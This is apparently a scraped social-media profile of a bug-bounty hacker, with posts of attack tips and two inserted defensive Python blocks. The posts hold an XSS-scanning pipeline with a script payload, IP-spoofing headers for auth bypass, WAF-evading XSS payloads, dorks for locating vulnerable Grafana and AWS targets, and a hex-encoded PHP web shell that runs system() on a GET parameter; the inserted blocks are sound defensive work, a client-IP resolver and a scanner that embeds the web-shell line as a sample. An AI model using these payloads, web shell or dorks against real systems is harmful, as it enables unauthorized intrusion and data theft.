DarkShadow

@darkshadow2bd

Followers: 2K
Following: 1K
Media: 96
Statuses: 255

Ethical Hacker | Penetration Tester | Security Researcher | Bug Hunter | Exploit Developer. 🔥~For more Join my New telegram Channel👉🏼 https://t.co/9p1yvzluA4 ✨

404 Not Found
Joined September 2024
@darkshadow2bd
DarkShadow
4 months
Recently disclosed HackerOne critical bug, leaking sensitive information, which can be exploited in under a few minutes! Rewarded $25,000😏. Read the full POC in my telegram channel 👉🏼
@darkshadow2bd
DarkShadow
15 hours
Wayback + httpx + GF + Dalfox.
cat domains.txt | httpx -silent -ports 80,443,8080,8443,3000,8000 | waybackurls | grep "=" | uro | gf xss | qsreplace '"><script>alert(1)</script>' | while read url; do curl -s "$url" | grep -q "<script>alert(1)</script>" && echo "[XSS] $url"; done
@darkshadow2bd
DarkShadow
22 hours
🔎Most critical IDOR paths:
/api/user/123
/api/v1/user?id=123
/api/v1/file?id=123
/api/files/123/download
/api/issues/123
/api/v2/statement/123
/download?file=123.pdf
🔎Parameters: id, uid, profile, file, doc_id, order, ticket, case.
Read the full method
@darkshadow2bd
DarkShadow
3 days
X-Forwarded-For: 127.0.0.1
X-Real-IP: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
True-Client-IP: 127.0.0.1
CF-Connecting-IP: 127.0.0.1
Fastly-Client-IP: 127.0.0.1
Proxy-Client-IP: 127.0.0.1
Read all auth bypass header
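Added example, not part of the post or the author's material: a server-side way to resolve the client address so that the headers listed above cannot influence access decisions, plus a check that flags requests claiming a loopback client. The trusted proxy range and the function names are assumptions made for illustration.

```python
import ipaddress

# Assumption: our own reverse proxies live in this range and append the
# address they saw to X-Forwarded-For. Adjust to the real deployment.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]

# The headers listed in the post. Any client can set all of them.
SPOOFABLE = ("X-Forwarded-For", "X-Real-IP", "X-Client-IP", "X-Remote-IP",
             "X-Remote-Addr", "True-Client-IP", "CF-Connecting-IP",
             "Fastly-Client-IP", "Proxy-Client-IP")


def _parse(value):
    """Return an ip_address object, or None for anything malformed."""
    try:
        return ipaddress.ip_address(value.strip())
    except ValueError:
        return None


def _trusted(addr):
    return any(addr in net for net in TRUSTED_PROXIES)


def client_ip(peer_ip, headers):
    """Address to use for access decisions and logging."""
    peer = _parse(peer_ip)
    if peer is None or not _trusted(peer):
        return peer_ip                  # direct connection: ignore every header
    lower = {k.lower(): v for k, v in headers.items()}
    hops = lower.get("x-forwarded-for", "").split(",")
    for hop in reversed(hops):          # rightmost entries were added by our proxies
        addr = _parse(hop)
        if addr is None:
            break                       # malformed chain: fall back to the peer
        if not _trusted(addr):
            return str(addr)            # first hop we do not control
    return peer_ip


def loopback_claims(headers):
    """Names of listed headers that claim a loopback client (worth alerting on)."""
    lower = {k.lower(): v for k, v in headers.items()}
    hits = []
    for name in SPOOFABLE:
        values = lower.get(name.lower(), "").split(",")
        if any(a is not None and a.is_loopback for a in map(_parse, values)):
            hits.append(name)
    return hits
```

Access rules such as "allow 127.0.0.1" should be evaluated against the value returned by client_ip, never against a raw header.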
@darkshadow2bd
DarkShadow
5 days
🔥Find critical vulnerabilities in JS files✨. Look inside these JS files: 🔍main, app, runtime, bundle, polyfills, auth, config, settings, local, dev, data, api, session, user, core, client, server, utils, base. Read the full method 👇🏼
@darkshadow2bd
DarkShadow
15 days
XSS in Google 💥
@darkshadow2bd
DarkShadow
16 days
WAF blocked ❌
javascript:alert()
WAF welcome ✅
javascript:new Function`background="red"`
✔️ If the WAF blocked additional functions, then try to change the background color💥. For more join my telegram
@darkshadow2bd
DarkShadow
28 days
✨XSS to account takeover in Paytm!🔥. The payload is big, so grab the payload from my telegram channel, I upload it there 👉🏼 Credit ~HACKER_TEAM49
@darkshadow2bd
DarkShadow
29 days
I published my private tool on GitHub. 𝙎𝙪𝙗𝘾𝙡𝙞𝙘𝙠 One-Click Subdomain Finder. A clean, lightweight, browser-based bookmarklet tool designed for one-click subdomain discovery. No installation, no dependencies, and it works directly in your browser!
@darkshadow2bd
DarkShadow
1 month
𝘿𝙖𝙧𝙠𝙀𝙣𝙙𝙁𝙞𝙣𝙙𝙚𝙧, my own private tool which I used to extract endpoints from the browser through passive recon.
✨ Features:
✅ Extract subdomains.
✅ Extract categorized endpoints from subdomains.
✅ Extract external domains.
github.com: darkshadow2bd/DarkEndFinder: BookMark and Find Subdomains, Endpoints, External Domains in your web browser.
@darkshadow2bd
DarkShadow
1 month
🔥1.6M banking records are uncovered 💥. ✨Contains massive information inside the DB, is it really cool? 😎
@darkshadow2bd
DarkShadow
1 month
🤫Unauthenticated WordPress Auth bypass 🔥. After sending the 1st request, use the provided last Cookie and send a request to /wp-admin and BOOM, auth bypassed 💥. For more join my telegram channel 👉🏼
@darkshadow2bd
DarkShadow
3 months
🌀 AWS bucket takeover like a pro and super simple but most of the time effective 🔥.
🧠 FOFA Dork:
body="specified bucket does not exist" && (host=" || host="target_domain_name_only") && port="443"
✨ Full methodology on my telegram.
@darkshadow2bd
DarkShadow
3 months
✨Grafana CVE-2025-4123 AWS SSRF @fofabot dork that finds all vulnerable versions💯.
👀 Very big Dork:
app="grafana" && cloud_name="aws" && (body="Grafana v10.0.0" || body="Grafana v10.0.1" || body="Grafana v10.0.2" [and more]
🌀Get the full dork:
@darkshadow2bd
DarkShadow
3 months
🌀I made this payload that is able to bypass WAF, even IDS, to execute RCE✅.
<?=eval(hex2bin("69662824785f3d245f4745545b305d297b73797374656d2824785f293b7d"))?>
👀Hex decode:
if($x_=$_GET[0]){system($x_);}
🔥For more join my telegram channel.
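Added example, not part of the post or the author's material: a static check for the wrapper shape shown above. It finds eval() calls fed by an encoded string literal, decodes the literal, and reports command sinks and request input in the result. Covering base64_decode as well as hex2bin, the sink list and the function names are assumptions; the benign sample is constructed.

```python
import base64
import binascii
import re

# eval(<decoder>("<literal>")): the wrapper shape from the post. base64_decode
# is included as an assumption, as the usual sibling of hex2bin.
WRAPPED = re.compile(
    r"""eval\s*\(\s*(hex2bin|base64_decode)\s*\(\s*(["'])([A-Za-z0-9+/=]+)\2\s*\)""",
    re.IGNORECASE)

# What matters once the literal is decoded: command sinks and request input.
RISKY = re.compile(
    r"\b(system|exec|shell_exec|passthru|popen|proc_open|assert|eval)\s*\("
    r"|\$_(GET|POST|REQUEST|COOKIE)\b", re.IGNORECASE)


def decode_literal(func, literal):
    """Undo the encoding a signature-based filter never looks through."""
    try:
        if func.lower() == "hex2bin":
            raw = binascii.unhexlify(literal)
        else:
            raw = base64.b64decode(literal, validate=True)
    except (binascii.Error, ValueError):
        return None                      # not valid hex/base64: nothing to report
    return raw.decode("utf-8", errors="replace")


def scan_php(source):
    """Return one finding per eval() of an encoded literal."""
    findings = []
    for m in WRAPPED.finditer(source):
        decoded = decode_literal(m.group(1), m.group(3))
        if decoded is None:
            continue
        hits = sorted({f.lower() if f else "$_" + g.upper()
                       for f, g in RISKY.findall(decoded)})
        findings.append({"offset": m.start(), "decoded": decoded, "hits": hits})
    return findings


# The line quoted in the post, and a constructed benign use of hex2bin.
POST_SAMPLE = '<?=eval(hex2bin("69662824785f3d245f4745545b305d297b73797374656d2824785f293b7d"))?>'
BENIGN_SAMPLE = '<?php echo hex2bin("48656c6c6f"); ?>'
```

Any finding deserves review, since legitimate code rarely evaluates an encoded literal; a non-empty hits list marks the ones that reach a command sink or read request input.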
@darkshadow2bd
DarkShadow
3 months
🌀Chrome DevTools is actually a webpage itself🙆🏼.
Url:
devtools://devtools/bundled/devtools_app.html
Try this:
🔥 Open the URL
🔥 Then hit F12 inside DevTools
🔥 BOOM — you're debugging the DevTools itself 🤯
✨For more join my telegram channel
@darkshadow2bd
DarkShadow
3 months
Using FOFA @fofabot Dorking you can see the content behind 401 unauthenticated🤯.
Dork:
domain="401_subdomain" && (body=".php" || body=".pdf" || body=".xls" || body=".html" || body=".js" || body=".json" || body=".jpg" || body=".conf")
Read full on telegram.
@darkshadow2bd
DarkShadow
3 months
🔥Find all VDPs worldwide using this simple dork😎.
Dork:
(body="/responsible-disclosure" || body="/.well-known/security.txt") && port="443"
✨For more bug bounty & pen testing tips join my telegram channel 🤍.
@darkshadow2bd
DarkShadow
3 months
🔥RCE in Auth Login ☠️. Before testing SQLi, test RCE in login page 😎. Join my telegram channel for more bug bounty and penetration testing.
@darkshadow2bd
DarkShadow
3 months
💥Arbitrary administrator role user creation via a WordPress plugin💯. For more join my telegram channel 👉🏼
@darkshadow2bd
DarkShadow
3 months
🔥Out-of-scope target led to in-scope target AUTH bypass vulnerability💥. The target was using a proxy server to load content used by the proxy. But here comes the twist, I found a file in their proxy server. Read the full story👉🏼